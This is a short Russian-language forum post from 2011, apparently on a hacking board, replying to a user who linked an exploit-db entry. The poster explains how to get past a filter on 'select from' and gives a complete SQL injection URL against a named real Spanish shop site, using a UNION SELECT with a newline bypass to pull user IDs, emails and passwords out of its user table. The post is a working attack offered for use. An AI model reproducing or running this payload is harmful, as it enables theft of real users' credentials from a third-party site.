28.01.2011, 14:03
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от DCrypt
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
|
|